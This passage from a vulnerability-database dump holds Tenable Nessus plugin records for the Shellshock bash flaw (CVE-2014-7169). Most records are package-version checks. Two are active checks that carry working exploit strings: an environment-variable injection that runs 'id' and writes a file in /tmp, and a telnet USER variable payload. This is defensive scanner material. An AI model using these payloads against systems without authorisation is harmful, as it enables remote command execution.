(USN-2363-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "p-cpe:/a:canonical:ubuntu_linux:bash"], "id": "UBUNTU_USN-2363-1.NASL", "href": "https://www.tenable.com/plugins/nessus/77897", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2363-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77897);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"USN\", value:\"2363-1\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerability (USN-2363-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"Tavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://usn.ubuntu.com/2363-1/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|12\\.04|14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04 / 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"bash\", pkgver:\"4.1-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"bash\", pkgver:\"4.2-2ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bash\", pkgver:\"4.3-7ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:56", "description": "The remote host is running a version of Bash that is vulnerable to command injection via environment variable manipulation. Depending on the configuration of the system, an attacker can remotely execute arbitrary code.", "cvss3": {}, "published": "2014-10-13T00:00:00", "type": "nessus", "title": "Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "BASH_CVE_2014_7169.NASL", "href": "https://www.tenable.com/plugins/nessus/78385", "sourceData": "#TRUSTED 2f9886caf1e20135182df82d1b5a31d466379a741f9989af901138d6bc4c1e8971e9309fce299db68f958d74726a4cc38e0e8709890b37dde0919fa52cb178d83034781aee324a948b54339bb4fae09c8ff201006f8848f540faed3b43976014f26a839a35c4b8bdf262d468c6a9e74128388e1a98a77ac8bb92df74982d80231a17dbefb0aba8e8338baaccf8af46f194efe44dbd1193a9804539f3347449838803c49e8f02e3dfe4e2334bf822f3aaac80b6d427f356db0c79909db6c7364d6d7d428662c83cbd68ff199d28416260d9b8759175086997dac81c899759e4fc32e52efc896911a3d4ac9378e444c92028e0ea30125ea99358d00ffff89ca0be915fa97c8299e2b3f5d8cd7fe33f5926ca8431245035b3de03b8964366333adc8993ef9d46b39c7ae0bd72356011679e776eb996e4c81bc858bd655b46de1c7517a47d0fc59491ce4de4cf2a0905352b4921bbe904048100086b4ed015575d1314620dd727458bd94959e2f455338628ee968350d1e190398582bf763467da6d0e987a300dd2214c8a8f47ad3ab558f95f03dcae8363bf1279148d9b101247512e9bad337f7219ff8b81b14b8ce29a6407640f6fcdfe0bfdaebd44d812af1141406ccc3b3cf52dd92d8b4b54b4f4eeb45974fd63a01b5df36233e199e4053ec9f7deed3abaf26502a514237122c98f62520bd0e506a07017bf805d9881f81cb3\n#TRUST-RSA-SHA256 202736ec1fae9ab6b777dc308acf4c2a3cc99b3d69b73a3abc3124f4f111afd466555b11d79e75e9dce9094a6fc31afa6d2d2fb2eebc33fc0239010250a9ac3ab7671c5128583ec14a48872c1af4552bd33ed11ca3da26296baea89e1fd93c3e362cd8932f4dcea9957d793a7329dcc1b79f1b94639404fe4805a55eb94c33c23d01e3311e33d72f29c74d9fd4a6be96cb0e38812e7d779125159a3e94e65a7313a748c9d9e5979a089beba56ff3810573aca6e5537db7c39a65962e40a85cd82b35538de29aaa763891c9634e2c97d6efb14e9743c9ed98bea33039bb173d90c1e01e8f2d702688ba1fbe3d9ed0fc88696c5a8fcd02f8294c325306f1631a02fb7679b408add9cdf61f7c786c51c0519cff0597b7d55010907655505d6cf93610188dc4875afc6dd5ae66bacaa434d1f28aa0c33d3a763025271470de1337e042cd5186cbd726f8db586af1c730d2154defd96f8794e3065cb87ece829f8c9807cd3d514864f94e029e8a23fa6fcf940a26f3bfa6a6072467437b7b554d38c58197a23537fb2b220bf5816c395838f68818c61ca952e1a44283bde3429a58562452fdc6550161eb2823e81b0911755d9465c56faffb4df907e54d0298239c7ab7a75c3181666f7df792dcbd28306e987fd5d080dc360e47ce84859bac849a1216a5e7f3e0c51a76681802091fac6b3882fd4dcffec5b68f49fd1d56e27e76cc\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78385);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A system shell on the remote host is vulnerable to command injection.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Bash that is vulnerable to\ncommand injection via environment variable manipulation. Depending on\nthe configuration of the system, an attacker can remotely execute\narbitrary code.\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate updates.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pure-FTPd External Authentication Bash Environment Variable Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"HostLevelChecks/proto\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude('ssh_func.inc');\ninclude('telnet_func.inc');\ninclude('hostlevel_funcs.inc');\ninclude('data_protection.inc');\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS ||\n get_one_kb_item('HostLevelChecks/proto') == 'local')\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nvar proto = get_kb_item_or_exit('HostLevelChecks/proto');\n\nvar port = get_service(svc:\"ssh\", default:22, exit_on_fail:TRUE);\nif (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);\n\nvar info_t;\n\nif (proto == 'local')\n info_t = INFO_LOCAL;\nelse if (proto == 'ssh')\n{\n info_t = INFO_SSH;\n var ret = ssh_open_connection();\n if (!ret) audit(AUDIT_FN_FAIL, 'ssh_open_connection');\n}\nelse\n exit(0, 'This plugin only attempts to run commands locally or via SSH, and neither is available against the remote host.');\n\n var AIX_Check = get_kb_item(\"Host/AIX/version\");\n if (!isnull(AIX_Check) && AIX_Check =~ '^AIX-[0-5].')\n {\n if(info_t == INFO_SSH) ssh_close_connection();\n exit(0, \"Commands are not supported on AIX 5.1 and below\");\n }\nelse\n var command = \"cd /tmp && X='() { (a)=>\\' bash -c 'echo /usr/bin/id' && cat /tmp/echo && rm /tmp/echo\";\n var output = info_send_cmd(cmd:command);\n\n if(info_t == INFO_SSH) ssh_close_connection();\n if (output !~ \"uid=[0-9]+.*gid=[0-9]+.*\") audit(AUDIT_HOST_NOT, \"affected.\");\n\nvar report =\n '\\n' + 'Nessus was able to exploit a flaw in the patch for CVE-2014-7169' +\n '\\n' + 'and write to a file on the target system.' +\n '\\n' +\n '\\n' + 'File contents :' +\n '\\n' +\n '\\n' + data_protection::sanitize_uid(output:output) +\n '\\n' +\n '\\n' + 'Note: Nessus has attempted to remove the file from the /tmp directory.\\n';\nsecurity_report_v4(port:port,extra:report,severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:42", "description": "The remote host is running a version of Bash that is vulnerable to command injection via environment variable manipulation. Depending on the configuration of the system, an attacker could remotely execute arbitrary code.", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "GNU Bash Local Environment Variable Handling Command Injection via Telnet (CVE-2014-7169) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "BASH_REMOTE_CODE_EXECUTION_TELNET.NASL", "href": "https://www.tenable.com/plugins/nessus/77857", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77857);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"GNU Bash Local Environment Variable Handling Command Injection via Telnet (CVE-2014-7169) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A system shell on the remote host is vulnerable to command injection.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Bash that is vulnerable to\ncommand injection via environment variable manipulation. Depending on\nthe configuration of the system, an attacker could remotely execute\narbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update Bash.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"telnet.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"telnet2_func.inc\");\ninclude(\"audit.inc\");\ninclude(\"data_protection.inc\");\n\n\nport = get_service(svc:\"telnet\", default:23, exit_on_fail:TRUE);\n\nglobal_var rcvdata;\nglobal_var cnt;\nglobal_var two_output;\n\nfunction local_telnet_callback()\n{\n local_var data, report;\n\n data = _FCT_ANON_ARGS[0];\n\n # Accumulate each byte as it's received.\n if (data && ord(data[0]) != 0x00 && ord(data[0]) != 0x0d) rcvdata += data[0];\n\n if ( 'Plugin output: 2' >< rcvdata && data[0] == '\\n' )\n {\n two_output = rcvdata;\n return -1;\n }\n\n if ( 'uid=' >< rcvdata && data[0] == '\\n' )\n {\n report =\n'It was possible to exploit this vulnerability by sending a malformed\nUSER environment variable to the remote server, which allowed us to\nexecute the \\'id\\' command:\\n' + rcvdata;\n\n security_hole(port:port, extra:report);\n exit(0);\n }\n\n if (\"login: \" >< rcvdata || 'assword:' >< rcvdata )\n exit(0, \"The remote host is running a telnet server that is not configured to run a shell script on connect, and so it is not affected.\");\n}\n\n# Set up the environment.\ntest_command = \"echo Plugin output: $((1+1))\";\nenv_data =\n mkbyte(0) +\n mkbyte(0) + \"USER\" +\n mkbyte(1) + \"() { :;}; \" + test_command;\n\noptions = NULL;\noptions[0] = make_list(OPT_NEW_ENV, env_data);\n\ncnt = 0;\n# Connect and process options.\nif (!telnet2_init(port:port, options:options, timeout:5*get_read_timeout()))\n audit(AUDIT_SVC_FAIL, \"telnet\", port);\n\nrcvdata = NULL;\ntwo_output = NULL;\n\ntelnet_loop(telnet_callback_fn:@local_telnet_callback);\n\n# Set up the environment.\ntest_command = \"/usr/bin/id\";\nenv_data =\n mkbyte(0) +\n mkbyte(0) + \"USER\" +\n mkbyte(1) + \"() { :;}; \" + test_command;\n\noptions = NULL;\noptions[0] = make_list(OPT_NEW_ENV, env_data);\n\ncnt = 0;\n# Connect and process options.\nif (!telnet2_init(port:port, options:options, timeout:5*get_read_timeout()))\n audit(AUDIT_SVC_FAIL, \"telnet\", port);\n\nrcvdata = NULL;\ntelnet_loop(telnet_callback_fn:@local_telnet_callback);\n\nif (!isnull(two_output))\n{\n report =\n'It was possible to exploit this vulnerability by sending a malformed\nUSER environment variable to the remote server, which allowed us to\nexecute the \\'echo Plugin output: $((1+1))\\' command:\\n' + data_protection::sanitize_uid(output:two_output);\n\n security_hole(port:port, extra:report);\n exit(0);\n}\n\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:06", "description": "Swapping Florian's unofficial patches for those released by bash upstream.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-10-06T00:00:00", "type": "nessus", "title": "Fedora 20 : bash-4.2.51-2.fc20 (2014-12202)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:bash"], "id": "FEDORA_2014-12202.NASL", "href": "https://www.tenable.com/plugins/nessus/78058", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-12202.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78058);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"FEDORA\", value:\"2014-12202\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Fedora 20 : bash-4.2.51-2.fc20 (2014-12202)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Swapping Florian's unofficial patches for those released by bash\nupstream.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/139900.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c47a82e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"bash-4.2.51-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:43", "description": "Description of changes:\n\n[4.1.2-15.1.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : bash (ELSA-2014-3075)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "p-cpe:/a:oracle:linux:bash-doc", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2014-3075.NASL", "href": "https://www.tenable.com/plugins/nessus/77891", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3075.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77891);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 6 : bash (ELSA-2014-3075)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[4.1.2-15.1.0.1]\n- Preliminary fix for CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004480.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"bash-4.1.2-15.el6_5.1.0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bash-doc-4.1.2-15.el6_5.1.0.1\")) 